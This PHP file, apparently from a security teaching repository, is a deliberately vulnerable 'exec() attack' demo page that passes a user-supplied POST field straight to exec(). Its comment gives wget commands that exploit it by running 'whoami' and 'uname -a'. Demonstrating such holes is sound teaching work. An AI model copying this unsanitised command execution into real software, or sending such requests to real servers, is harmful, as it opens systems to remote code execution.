PageRenderTime 47ms CodeModel.GetById 9ms RepoModel.GetById 0ms app.codeStats 0ms

/html/exec.php

https://bitbucket.org/gerbercj/section8
PHP | 41 lines | 30 code | 2 blank | 9 comment | 1 complexity | 08588232bad006f3000a20a61de910f2 MD5 | raw file
  1. <?php
  2. /**********************************************************************
  3. * exec() attack
  4. *
  5. * To demonstrate the exploit, try the following:
  6. * wget -qO- http://section8/exec.php --post-data="cmd=whoami"
  7. * wget -qO- http://section8/exec.php --post-data="cmd=uname -a"
  8. *
  9. **********************************************************************/
  10. // handle command requests
  11. if (isset($_POST['cmd']))
  12. exec($_POST['cmd'], $output);
  13. else
  14. $output=array();
  15. ?>
  16. <html>
  17. <head>
  18. <title>exec() Attack</title>
  19. </head>
  20. <body>
  21. <p>Available commands:</p>
  22. <form method="POST" action="exec.php">
  23. <select name="cmd">
  24. <option value='date' selected='selected'>date</option>
  25. <option value='cal'>cal</option>
  26. <option value='ls'>ls</option>
  27. </select>
  28. <input type="submit" name="exec() it!" />
  29. </form>
  30. <hr />
  31. <p>Output of last command:</p>
  32. <pre>
  33. <?php
  34. foreach ($output as $line)
  35. print "$line\n";
  36. ?>
  37. </pre>
  38. </body>
  39. </html>